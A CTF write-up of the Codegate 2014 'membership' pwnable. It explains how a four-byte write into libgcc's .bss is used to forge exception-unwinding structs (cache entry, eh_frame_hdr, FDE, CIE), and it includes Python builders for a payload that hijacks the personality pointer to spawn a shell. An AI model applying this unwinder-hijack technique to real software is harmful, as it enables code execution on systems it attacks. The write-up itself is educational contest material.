[Codegate 2014] membership (800pt pwnable) write-up

This is a write-up for the 800-point pwnable challenge called ‘membership’ from the Codegate CTF 2014 pre-qualification round. PPP was the only team to solve this challenge during the competition, so I decided to do a write-up for it. Enjoy. (awesie and ricky solved it during the competition.)

1. Challenge overview

You can download a copy of the binary here.
During the competition, we could ssh into one of their machines to exploit and read the flag.


As you can see, it’s a 32-bit ELF binary. So, let’s open it up in IDA and start reversing.

The program looks really simple. It just installs a couple of signal handlers (specifically for SIGSEGV and SIGFPE) and calls a main (interesting) function, which prompts us for the userid and password. Then, the program calculates the SHA256 hash of the given password and compares it with the stored hash. If the hashes do not match, a runtime error exception is thrown and the program aborts. If we pass in the correct password, we get a shell :)

Since guessing the correct password or cracking the hash is not a viable option for us, we try to locate other bugs that can be useful.

As highlighted above, the program dereferences a null pointer (*0 = 0) if the length of the password is greater than or equal to 16 bytes. Obviously it is going to trigger SIGSEGV, but do you remember what we said earlier about installing the signal handlers? And yes, one of them was SIGSEGV handler.

So, instead of crashing miserably, the program calls the handler.
Let’s examine what this handler does.

SIGSEGV handler installer

Now, if we look at the SIGSEGV_handler, we may think it doesn’t really do anything useful.
Note that it just fills in the exception information and calls __cxa_throw to throw an exception.

At this point, we could go on and explain what SIGFPE_handler does as well, but we’ll skip it since it’s not that interesting and is not needed for a successful exploitation.
You may ask… so, what’s left?


2. Vulnerability

Notice that this is a C++ program with exception throwing. We should check how C++ exception handling works.

It uses DWARF, a standardized debugging data format that is also used for unwinding the stack and handling exceptions.

There was a CTF problem in the past that involved DWARF (called Khazad from Ghost in the Shellcode 2012): Check out these write-ups if you are interested!

Anyways, DWARF information can be displayed using binutils tools such as objdump or readelf:

Take a close look at the entry with “pc=08048fa7..0804904d”.
This entry basically describes what should happen when an exception is thrown within that PC range. Note that the SIGSEGV_handler throws an exception at 0x0804901A, which is in that range (the range covers precisely the SIGSEGV_handler function).

Ok. Now, we have to make sense of what all those operations mean :)
DW_CFA_val_expression contains CFA expressions that are defined here.

Luckily, it’s not that hard to understand the expressions. We can simply think of it as a stack machine:

So, in short, it checks whether the username is “stdchpie” and password[2:5] is equal to “\xb1\x2e\x40”.
If either condition fails, it transfers execution to 0x8048f18, which does exit(0).
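To make the two conditions concrete, here is a tiny Python model of the check. It is not the DWARF bytecode itself, just the logic as described above. The function name and the sample password are ours, and how the real expression treats bytes after the username is not modelled.

```python
def handler_check(userid: bytes, password: bytes) -> bool:
    """Model of the two conditions evaluated by the DWARF expression.

    Hypothetical helper: returns True when execution would continue to
    the 'nested' code, False when it would go to the exit(0) path.
    """
    return userid == b"stdchpie" and password[2:5] == b"\xb1\x2e\x40"


# A 16-byte sample password: filler byte, low address byte, the three
# magic bytes, a 4-byte value, then padding (all filler is arbitrary).
good = b"A" + b"\x01" + b"\xb1\x2e\x40" + b"BBBB" + b"C" * 7

print(handler_check(b"stdchpie", good))        # True
print(handler_check(b"stdchpie", b"A" * 16))   # False
```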

What happens if we satisfy the conditions? Good question.
It basically dumps us to the following code:

This code prints out the “nested” string and writes password[5:9] to *password[1:5]. This means we get to write any 4-byte value we choose anywhere in the 0x402eb1?? address range. A 4-byte write is a pretty strong tool in exploitation, but when we are limited to a 256-byte range, it’s difficult to make it useful. Also, it immediately jumps to 0x8048cc0, where it does another null pointer dereference, causing SIGSEGV to happen again. Thus, we get an infinite stream of ‘nested’ strings printed out.

Alright. Let’s summarize what we know and have so far.

  1. We can trigger a null pointer dereference, causing SIGSEGV handler to get executed (and thus, DWARF CFA expressions), by sending a password that’s >= 16 bytes.
  2. With a carefully constructed password, we can write any 4-byte value to any address between 0x402eb100 and 0x402eb1ff.
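The write primitive can be sketched in Python as follows. This only models how a password maps to an (address, value) pair on a little-endian 32-bit target. The helper names, the leading filler byte and the padding byte are our own choices, and any restrictions the program puts on input bytes are not modelled.

```python
import struct


def make_password(low_byte: int, value: int) -> bytes:
    """Build a password that requests *(0x402eb1XX) = value (hypothetical helper)."""
    pw = b"A"                          # password[0]: filler
    pw += bytes([low_byte])            # password[1]: low byte of the address
    pw += b"\xb1\x2e\x40"              # password[2:5]: must match the check
    pw += struct.pack("<I", value)     # password[5:9]: value to write
    return pw.ljust(16, b"P")          # >= 16 bytes so the null dereference fires


def decode_write(password: bytes):
    """Return the (address, value) pair implied by *password[1:5] = password[5:9]."""
    (addr,) = struct.unpack("<I", password[1:5])
    (value,) = struct.unpack("<I", password[5:9])
    return addr, value


addr, value = decode_write(make_password(0x18, 0x4002501C))
print(hex(addr), hex(value))   # 0x402eb118 0x4002501c
```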

The natural question is, then, what is mapped on that memory address?
With ulimit -s unlimited ,

As we can see above (highlighted), the address range falls into libgcc’s memory. Specifically, it matches a portion of its .bss section.

So, what is there in libgcc_s.so.1, you ask.

Precisely, this.
And that’s it.

At this point, we downloaded and opened up the libgcc source code to look at where some of these data structures are used, and tried to look for ways to get EIP control.

So the journey begins.

3. libgcc source code analysis

Note that this step took the longest since we had to actually understand the parts of the gcc code that do stack unwinding and exception handling.

You can download the source for gcc here (gcc-4.8.1, Ubuntu 13.10).

During the competition, we chose each data structure of interest and traced backwards to find out whether by controlling said structure we can influence anything (e.g. function pointer) on callers while handling exceptions to hijack the control flow.

Since we now know which one can be used to control EIP, we will start from there: frame_hdr_cache_head is our target. [It may very well be possible to solve the challenge with a different method/structure, but this is the one that we ended up using during the CTF.]

If we locate the place where frame_hdr_cache_head is referenced, we land in the middle of the _Unwind_IteratePhdrCallback function in libgcc/unwind-dw2-fde-dip.c.

frame_hdr_cache_head points to the first element of a singly linked list that contains frame_hdr_cache_element(s).
The code iterates through the list and finds the entry for data->pc in the cache. data->pc is the program counter of the frame we are trying to handle the exception for.

This cache is filled in as the program discovers exception handler frames (eh_frame).

The following is the struct definition for frame_hdr_cache_element:
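As a rough sketch of that layout on a 32-bit target, here is a ctypes model. The field names and their order are as we recall them from unwind-dw2-fde-dip.c, so treat them as an assumption and check against the source. The Python class name is ours, and pointers are modelled as plain 32-bit integers.

```python
import ctypes


class FrameHdrCacheElement(ctypes.Structure):
    """32-bit model of frame_hdr_cache_element (pointers shown as uint32)."""
    _fields_ = [
        ("pc_low", ctypes.c_uint32),          # start of the covered PC range
        ("pc_high", ctypes.c_uint32),         # end of the covered PC range
        ("load_base", ctypes.c_uint32),       # load address of the object
        ("p_eh_frame_hdr", ctypes.c_uint32),  # pointer to an Elf32_Phdr
        ("p_dynamic", ctypes.c_uint32),       # pointer to an Elf32_Phdr
        ("link", ctypes.c_uint32),            # next element in the list
    ]


print(ctypes.sizeof(FrameHdrCacheElement))            # 24
print(FrameHdrCacheElement.p_eh_frame_hdr.offset)     # 12
```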

So, if we control where frame_hdr_cache_head points to, we can also construct/control the elements inside. Before we dive into what happens when we find an element in the cache and ‘goto found’, let’s step back for a minute and see if we can even get here and what that allows us to do.

The function we just looked at (_Unwind_IteratePhdrCallback) is called from _Unwind_Find_FDE in unwind-dw2-fde-dip.c.
Then, _Unwind_Find_FDE function is called from uw_frame_state_for function in unwind-dw2.c.
uw_frame_state_for function is called from _Unwind_RaiseException function in unwind.inc, which provides an interface to raise an exception given an exception object.

Where does _Unwind_RaiseException get called, then?
It gets called by __cxa_throw, and if you remember, our SIGSEGV_handler invokes this function to raise an exception.

Alright. We have now confirmed that we can get to that code by causing the binary to throw an exception and letting libgcc unwind/handle the exception.

But is there anything interesting in this code path that can give us EIP control? Yes.

Let’s review _Unwind_RaiseException a little bit:

Notice the highlighted lines. What do you see?

A function pointer getting called! And we *may* be able to control fs.personality.
Let’s find out!

Remember that the struct pointer that we are interested in tracing is fs (aka 2nd argument).
We see here that _Unwind_Find_FDE is used to get fde (which is used to get cie), and extract_cie_info takes cie and fs as its first and third argument, respectively.

So, what happens in extract_cie_info?

extract_cie_info parses cie and updates fs->personality. We’ll work out the details later.

Okay, now we have to look into the _Unwind_Find_FDE function to find out what the value it returns (fde) is:

As we discussed earlier, _Unwind_Find_FDE calls _Unwind_IteratePhdrCallback, which fills the data struct.
Then, it returns data.ret.

Whoa. After that chain of functions, we have now come back to where we started: _Unwind_IteratePhdrCallback.
Warning: This is a really long function :p

To show a good idea of the call stack, here’s a diagram:

Fortunately, we do not have to look at all of its details. As we learned earlier, the cache for eh_frame_hdr is looked up and the following is performed in case the entry was found:

Note that data->ret is set to f on line 415, where f is an FDE pointer found by performing a binary search.
Comments from unwind-dw2-fde.h briefly describe FDE & CIE lookup:

Let’s review some of the primitive structs and functions that are used in the code above to get a better understanding of what’s going on. We will make references to these as we explain the code later.
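For orientation, here is a hedged ctypes model of three of those structs as they would look on a 32-bit target. Field names follow our recollection of unwind-dw2-fde-dip.c and unwind-dw2-fde.h, so verify them against the source. The Python class names are ours, and only the fixed-size head of dwarf_fde is modelled (pc_begin and what follows are variable-length).

```python
import ctypes


class UnwEhFrameHdr(ctypes.Structure):
    """Model of unw_eh_frame_hdr: a version byte plus three encoding bytes."""
    _fields_ = [
        ("version", ctypes.c_uint8),
        ("eh_frame_ptr_enc", ctypes.c_uint8),
        ("fde_count_enc", ctypes.c_uint8),
        ("table_enc", ctypes.c_uint8),
    ]


class FdeTableEntry(ctypes.Structure):
    """Model of one fde_table entry; both fields are signed 32-bit offsets."""
    _fields_ = [
        ("initial_loc", ctypes.c_int32),
        ("fde", ctypes.c_int32),
    ]


class DwarfFdeHead(ctypes.Structure):
    """Fixed-size head of dwarf_fde; pc_begin[] follows in memory."""
    _fields_ = [
        ("length", ctypes.c_uint32),
        ("CIE_delta", ctypes.c_int32),
    ]


for cls in (UnwEhFrameHdr, FdeTableEntry, DwarfFdeHead):
    print(cls.__name__, ctypes.sizeof(cls))
```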

And, these are some functions that are used when parsing data:
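Two of the parsing helpers are LEB128 decoders (read_uleb128 and read_sleb128 in unwind-pe.h). A minimal Python equivalent of the standard LEB128 decoding is sketched below. It mirrors the algorithm, not the exact libgcc signatures: here each function takes a buffer and a position and returns the decoded value with the new position.

```python
def read_uleb128(buf: bytes, pos: int = 0):
    """Decode an unsigned LEB128 value; return (value, next_position)."""
    result = 0
    shift = 0
    while True:
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift   # low 7 bits carry data
        shift += 7
        if not byte & 0x80:                # high bit clear: last byte
            return result, pos


def read_sleb128(buf: bytes, pos: int = 0):
    """Decode a signed LEB128 value; return (value, next_position)."""
    result = 0
    shift = 0
    while True:
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        shift += 7
        if not byte & 0x80:
            if byte & 0x40:                # sign bit of the final byte
                result -= 1 << shift
            return result, pos


print(read_uleb128(b"\x07"))   # (7, 1)
print(read_sleb128(b"\x7c"))   # (-4, 1)
```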

That was a lot of stuff, but don’t worry about understanding/remembering all of them since we will go over the logic at somewhat high-level.

When an exception is thrown, the PC is looked up to find a correct FDE for the current function.

  1. First, they search the shared library cache linked list (whose head pointer we control).
  2. Once the entry is found, they get unw_eh_frame_hdr (the hdr variable) by adding p_vaddr and load_base. Then, they make sure the version of hdr is 1.
    • hdr also contains the flags for the encoding schemes of eh_frame_ptr, fde_count, and table.
    • The encoding flags are defined in unwind-pe.h, but the important ones are: DW_EH_PE_pcrel (0x10, pc-relative), DW_EH_PE_datarel (0x30, data-relative), DW_EH_PE_absptr (0x00, absolute), DW_EH_PE_sdata4 (0x0b, signed 4 byte), DW_EH_PE_udata4 (0x03, unsigned 4 byte).
  3. Parse eh_frame and fde_count.
  4. Perform a binary search in table for data->pc against table[i].initial_loc + data_base, where data_base is hdr.
  5. When an element is found in table, set f to table[mid].fde + data_base (thus calculating the FDE pointer).
  6. A final check is done by parsing the range to ensure that this FDE record covers data->pc
    ( table[mid].initial_loc + data_base <= data->pc < table[mid].initial_loc + data_base + range )
  7. data->ret  is filled with f.
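Steps 4 to 6 above can be modelled in a few lines of Python. This is a simplified sketch of the search logic, not a transcription of libgcc: the function name and the read_range callback (which stands in for parsing the range out of the FDE) are hypothetical, and all arithmetic is done modulo 2^32 to mimic a 32-bit target.

```python
MASK = 0xFFFFFFFF


def find_fde(table, data_base, pc, read_range):
    """Return the FDE address covering pc, or None.

    table      -- list of (initial_loc, fde) offsets, sorted by initial_loc
    data_base  -- address of hdr; both offsets are relative to it
    read_range -- callback: FDE address -> range length (stand-in for parsing)
    """
    lo, hi = 0, len(table)
    while lo < hi:
        mid = (lo + hi) // 2
        start = (table[mid][0] + data_base) & MASK
        if pc < start:
            hi = mid
        elif mid + 1 < len(table) and pc >= ((table[mid + 1][0] + data_base) & MASK):
            lo = mid + 1
        else:
            fde = (table[mid][1] + data_base) & MASK
            rng = read_range(fde)
            # Final check: start <= pc < start + range
            return fde if pc < ((start + rng) & MASK) else None
    return None


# The single fake entry used later in this write-up: it covers every PC.
fake_table = [(0xBFFDAFAC, 0x14)]
found = find_fde(fake_table, 0x40025054, 0x0804901A, lambda fde: 0xFFFFFFFF)
print(hex(found))   # 0x40025068
```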

It’s important to carefully construct a (fake) FDE record since it holds the CIE_delta field, which is used to locate the CIE record to be parsed later (for the personality function pointer).

The only piece that we haven’t visited yet is extract_cie_info, but we will visit it as we develop an exploit payload :)

4. Exploit development

Finally, we can start writing some evil awesome payload to pwn this binary.

Here’s our plan for the attack:

  1. Overwrite frame_hdr_cache_head (0x402eb118) to point to our stdin buffer (0x40025000 + 0x1c for skipping userid/password/padding).
  2. Construct fake structs:
    • cache_entry (frame_hdr_cache_element)
    • p_eh_frame_hdr (Elf32_Phdr)
    • hdr  (unw_eh_frame_hdr)
    • table (fde_table)
    • fde (dwarf_fde)
    • cie (dwarf_cie)
  3. When creating a fake cie struct, we make the personality function pointer 0x8048E97, where it does execlp("/bin/sh", "/bin/sh", 0), and get a shell!!

Note that some of the fields in the structs are relative offsets, so we need to plan where to put things and link them correctly.
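One way to do that planning is to compute every address up front. The sketch below assumes the structs are packed back to back starting at buffer + 0x1c, with sizes taken from the 32-bit layouts. The hdr, fde and cie addresses it produces match the ones used in the sections that follow, while the phdr and table addresses are derived by us rather than quoted.

```python
BUF = 0x40025000   # stdin buffer address from the plan above

# (name, size in bytes), in the order the fake structs are laid out
PARTS = [
    ("cache_entry", 0x18),  # six 4-byte fields
    ("phdr", 0x20),         # Elf32_Phdr
    ("hdr", 0x0C),          # 4 encoding bytes + eh_frame_ptr + fde_count
    ("table", 0x08),        # a single fde_table entry
    ("fde", 0x20),          # 4-byte length field + 0x1c bytes of body
    ("cie", 0x20),          # same size as the fde in this payload
]


def layout(base, start_offset, parts):
    """Assign consecutive addresses to each named part."""
    addrs = {}
    cur = base + start_offset
    for name, size in parts:
        addrs[name] = cur
        cur += size
    return addrs


addrs = layout(BUF, 0x1C, PARTS)
for name, addr in addrs.items():
    print(f"{name:12s} {addr:#x}")
```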

4-1. Trigger

Let’s start with a simple payload that would pass the check and trigger the bug.

As we can see in action, this payload triggers the bug and causes infinite SIGSEGV.
We currently chose 0x402eb101 for no particular reason, but we can see that memory is successfully written.

4-2. cache_entry & p_eh_frame_hdr construction

Now, we overwrite frame_hdr_cache_head to point to our stdin buffer.

We are going to start building fake structs from our buffer + 0x1c.

So what values should we use?
To avoid worrying about the search too much, we are going to set pc_low to 0x0 and pc_high to 0xFFFFFFFF. This basically says that this cache entry should be used for any exception thrown in this range of addresses, so we’ll catch everything. Also, to make the math easy, we are going to set load_base to 0. Finally, we have to set the p_eh_frame_hdr pointer to the fake Elf32_Phdr struct. We will put this fake phdr struct right after the fake cache_entry struct that we are currently building. The rest of the fields are not really used (for our purpose), so we can put dummy values.

This gives us this:

For p_eh_frame_hdr struct, we only care about p_vaddr which is used to calculate hdr (unw_eh_frame_hdr).
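A sketch of these two fake structs in Python, assuming little-endian 32-bit packing. The 0x41414141 filler is our own arbitrary choice for the fields described as unused, and the variable names are ours.

```python
import struct

BUF = 0x40025000
CACHE_ENTRY = BUF + 0x1C        # where the fake cache_entry starts
PHDR = CACHE_ENTRY + 0x18       # fake Elf32_Phdr right after it
HDR = BUF + 0x54                # where the fake hdr will live
DUMMY = 0x41414141              # arbitrary filler for unused fields

cache_entry = struct.pack(
    "<6I",
    0x00000000,   # pc_low
    0xFFFFFFFF,   # pc_high
    0x00000000,   # load_base
    PHDR,         # p_eh_frame_hdr -> fake Elf32_Phdr
    DUMMY,        # p_dynamic (unused for our purpose)
    DUMMY,        # link (unused: the first entry already matches)
)

phdr = struct.pack(
    "<8I",
    DUMMY,        # p_type
    DUMMY,        # p_offset
    HDR,          # p_vaddr: hdr = p_vaddr + load_base
    DUMMY,        # p_paddr
    DUMMY,        # p_filesz
    DUMMY,        # p_memsz
    DUMMY,        # p_flags
    DUMMY,        # p_align
)

print(hex(PHDR), len(cache_entry), len(phdr))   # 0x40025034 24 32
```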

Let’s see in action.

So, this payload basically lets us execute the goto found; code (unwind-dw2-fde-dip.c:225) since data->pc will be between pc_low and pc_high.

Then, on line 315, hdr is calculated by adding p_eh_frame_hdr->p_vaddr and load_base, thus pointing to 0x40025054.
Time to build a fake hdr struct!

4-3. hdr & table construction

Starting at +0x54 from our buffer comes the hdr struct.
It’s a 4 byte struct and we fill in reasonable values here, according to the encoding scheme mentioned above.

Then, as we saw earlier, eh_frame is read. Since the value is supposedly encoded with (DW_EH_PE_pcrel | DW_EH_PE_sdata4), this value in our data should be an offset from where the hdr is. However, the value of eh_frame isn’t really related to what we do, so we can put any value (read_encoded_value_with_base actually does the calculation given the base to correctly compute eh_frame’s value).

Ok, next check is the following:

We have picked the values for the encoding schemes such that we satisfy both conditions.
Then, fde_count is read.
Since we do not want to create more than one set of fake structs (to be searched with binary search later), we will force this to be 1.
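Here is one way the hdr bytes and the two values that follow could be built. The encoding constants come from unwind-pe.h. The choice of DW_EH_PE_udata4 for fde_count_enc and the zero placeholder for eh_frame_ptr are our assumptions, since the text above only says that reasonable values were used.

```python
import struct

# Encoding flags from unwind-pe.h
DW_EH_PE_udata4 = 0x03
DW_EH_PE_sdata4 = 0x0B
DW_EH_PE_pcrel = 0x10
DW_EH_PE_datarel = 0x30

hdr = bytes([
    1,                                    # version (must be 1)
    DW_EH_PE_pcrel | DW_EH_PE_sdata4,     # eh_frame_ptr_enc
    DW_EH_PE_udata4,                      # fde_count_enc (assumed)
    DW_EH_PE_datarel | DW_EH_PE_sdata4,   # table_enc
])
hdr += struct.pack("<i", 0)   # eh_frame_ptr: value does not matter here
hdr += struct.pack("<I", 1)   # fde_count: exactly one table entry

print(hdr.hex())   # 011b033b0000000001000000
```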

So with this data appended, we so far have this as our payload:

Then, the table comes next. fde_table struct has two fields: initial_loc and fde.

As mentioned earlier, in order for the search to succeed, we need to satisfy table[mid].initial_loc + data_base <= data->pc < table[mid].initial_loc + data_base + range.

Note that data_base is pointing at hdr (0x40025054). So we can set initial_loc to 0xBFFDAFAC such that initial_loc + data_base == 0x40025054 + 0xBFFDAFAC == 0x0 (modulo 2^32).

Also, the fde field is actually a (signed) offset from hdr, due to the (DW_EH_PE_datarel | DW_EH_PE_sdata4) encoding. So, we set it to 0x14 to indicate that our fake dwarf_fde struct will be located at 0x40025068.
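The two table values are easy to double check with 32-bit wrap-around arithmetic. The variable names below are ours.

```python
import struct

MASK = 0xFFFFFFFF
HDR = 0x40025054          # data_base
FDE = 0x40025068          # where the fake dwarf_fde will sit

initial_loc = (0x0 - HDR) & MASK   # so that initial_loc + data_base wraps to 0
fde_offset = FDE - HDR             # data-relative offset to the FDE

assert (initial_loc + HDR) & MASK == 0x0

table = struct.pack("<II", initial_loc, fde_offset)
print(hex(initial_loc), hex(fde_offset), table.hex())
# 0xbffdafac 0x14 acaffdbf14000000
```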

Fake hdr and table construction is done, and we now have this:

The current payload, when fed to the program, will result in a crash since it will read an invalid value for the range.
To make data->pc < initial_loc + data_base + range  true, we need to construct a fake dwarf_fde now.

4-4. fde & cie construction

As a final step, we are going to construct fde and cie records in our payload.

dwarf_fde struct has length, CIE_delta, and pc_begin fields (followed by fde_augmentation length, which should be 0).

We are going to make the length 0x1C, and CIE_delta 0xFFFFFFE4 (such that &CIE_delta - CIE_delta == 0x40025088; this will be explained later). We will set pc_begin to 0x0 (it doesn’t really matter what we put here).

What comes after pc_begin is the range. To explain a little bit, on line 412 in unwind-dw2-fde-dip.c, range is read from f->pc_begin[f_enc_size] where f_enc_size is 4, making the 4 bytes right after pc_begin the range. Since we made initial_loc + data_base equal to 0x0, we will make the range 0xFFFFFFFF. Then, we pad the last few bytes (so, technically we could shrink the length, but that’s what we used during the competition).
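As a sketch, the fake FDE could be packed like this. The zero padding is our assumption: the first padding byte doubles as the FDE augmentation length of 0 mentioned above, and the exact padding bytes used during the competition are not known to us.

```python
import struct

FDE = 0x40025068
FDE_LENGTH = 0x1C          # bytes that follow the 4-byte length field

fde = struct.pack(
    "<IIII",
    FDE_LENGTH,    # length
    0xFFFFFFE4,    # CIE_delta (-0x1c as a signed 32-bit value)
    0x00000000,    # pc_begin (value does not matter)
    0xFFFFFFFF,    # range: read from the 4 bytes after pc_begin
)
fde = fde.ljust(4 + FDE_LENGTH, b"\x00")   # zero padding, incl. aug length 0

print(len(fde), hex(FDE + len(fde)))   # 32 0x40025088
```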

This yields our payload to be:

We are almost there!!!

The payload above makes data->ret contain a pointer to our FDE struct, and execution returns to _Unwind_Find_FDE.

In _Unwind_Find_FDE, nothing interesting happens, and the same (a pointer to our fake FDE struct) is returned.

We are now back to uw_frame_state_for function (line 1180 in unwind-dw2.c). Since fde is not null, extract_cie_info is called with the cie pointer that is based on our fde.

Looking at the get_cie function, we can see why we put 0xFFFFFFE4 for CIE_delta value in our FDE struct. With our setup, get_cie will return the CIE struct’s address, which will be right after our fake FDE struct (aka 0x40025088).
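The arithmetic behind that can be checked with a small model of get_cie. This follows the expression quoted earlier (&CIE_delta - CIE_delta) with CIE_delta treated as a signed 32-bit value. The Python function is our own stand-in, not the libgcc code.

```python
import ctypes


def get_cie(fde_addr: int, cie_delta_raw: int) -> int:
    """Model of get_cie: address of the CIE_delta field minus its signed value."""
    cie_delta_addr = fde_addr + 4                  # CIE_delta follows length
    delta = ctypes.c_int32(cie_delta_raw).value    # 0xFFFFFFE4 -> -0x1c
    return (cie_delta_addr - delta) & 0xFFFFFFFF


print(hex(get_cie(0x40025068, 0xFFFFFFE4)))   # 0x40025088
```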

Now, we have 1 final function that we need to understand: extract_cie_info.

This function is mostly parsing stuff and filling in the _Unwind_Frame_State data based on the CIE record.

dwarf_cie struct has length, CIE_id, version, and augmentation — and depending on augmentation content, more data follows.

Here are the values we set for our fake CIE struct:

Data that follows after augmentation string (code_alignment, data_alignment, return_addr_col) are read in first.
We chose these values just because we saw these in normal CIE struct, but it shouldn’t matter what the values are.

Then, the rest of the data is parsed as augmentation contents (aka ‘zPLR’).

  1. If the first byte is ‘z’, it sets the fs->saw_z flag and notes that the length of the extra augmentation data (which follows the length itself) is 0x07.
  2. ‘P’ indicates that a personality routine is specified in the CIE (extra) augmentation, so it reads the personality_ptr value (4 bytes) based on the personality_enc encoding scheme, which we set to 0x0 to make it the absptr type.
  3. ‘L’ indicates a byte showing how the LSDA pointer is encoded. No idea what that is, but it’s not relevant, so we put 0x0.
  4. ‘R’ indicates a byte showing how FDE addresses are encoded. We put a sane value that we saw earlier, but it shouldn’t matter either.

Alright, now with some padding bytes to make the total length 0x1c, we are set.
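Putting the CIE description together, a builder might look like the sketch below. Several bytes are assumptions on our part: CIE_id 0 and version 1, the alignment and return-column bytes (0x01, 0x7c, 0x08, which are typical for x86 CIEs), the FDE encoding 0x1b, and the zero padding. Only the ‘zPLR’ string, the 0x07 augmentation length, the two 0x0 encodings and the total length 0x1c come from the text above.

```python
import struct


def build_cie(personality: int) -> bytes:
    """Build a fake CIE whose personality pointer is `personality` (sketch)."""
    aug_data = bytes([0x00])                     # personality_enc: absptr
    aug_data += struct.pack("<I", personality)   # personality routine pointer
    aug_data += bytes([0x00])                    # 'L': LSDA encoding
    aug_data += bytes([0x1B])                    # 'R': FDE encoding (assumed)

    body = struct.pack("<I", 0)                  # CIE_id (assumed 0)
    body += bytes([1])                           # version (assumed 1)
    body += b"zPLR\x00"                          # augmentation string
    body += bytes([0x01, 0x7C, 0x08])            # code/data align, return column
    body += bytes([len(aug_data)]) + aug_data    # augmentation length = 7
    body = body.ljust(0x1C, b"\x00")             # pad body to 0x1c bytes
    return struct.pack("<I", len(body)) + body


cie = build_cie(0x41424344)
print(len(cie), cie[17], cie[19:23].hex())   # 32 7 44434241
```

Swapping the argument for a different address changes only the four pointer bytes, so the rest of the payload stays the same.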

Thus far, we have built the following payload:

And corresponding output when we run this payload against the binary:

YAY!!! WE HAVE EIP CONTROL!!!!111!!11!

Ok, now on to the final and easiest step: getting a shell.

4-5. Give me a shell

Remember (from a while ago…) that there was code that does execlp("/bin/sh", "/bin/sh", 0) ?
For those who don’t remember, it’s located at 0x8048E97.

All we have to do at this point is to replace 0x41424344 (the personality routine pointer) with 0x8048e97.


Voila! We have our shell (and the flag, of course!)


5. Closing

I hope you enjoyed reading this write-up. (Although I suspect not.. due to its obscene length)

I apologize that this ended up being a LOT longer than I anticipated when I started writing, but I think it contains enough detail that people can follow along and reproduce the result.

Try it while their server is up!! Otherwise you will have to patch the binary such that the addresses work out.

Thank you for reading, and feel free to leave comments if you have any questions or suggestions.




6 Responses

  1. Zerith says:

    Awesome writeup. Thanks for this.

  2. jinmo123 says:

    awesome! thanks!!

  3. TresMignon says:

    Hi, thanks for your wonderful writeup!
    Would you mind if I ask you couple questions?
    I’m new to DWARF and I don’t understand how you analyze DW_OP_bra,
    “the number of bytes of the DWARF expression to skip forward or backward”, it says in the documentation.
    DW_OP_bra 50 , DW_OP_bra 29 and DW_OP_bra 8 all jumped to END in your example,
    but I couldn’t figure out how to calculate that T_T.
    Also, how do you find out that when you satisfy all conditions,
    the SIGSEV exception handler dumps to 0x08048CE8? Thank you very much :)

    • Cai says:

      Sure thing!
      DW_OP_bra is a branch expression which tells you how many bytes of DWARF expression it needs to skip. So if you count the bytes from each of branch instruction, you can see that it’s pointing to the END in my example. We just found out it dumps you there since you see ‘nested’ printed out and set a breakpoint to double check.

  4. PetitCochon says:

    WOW!!! Great job..

  5. jojo says:

    Amazing stuff .. keep a good work..

    bye N.
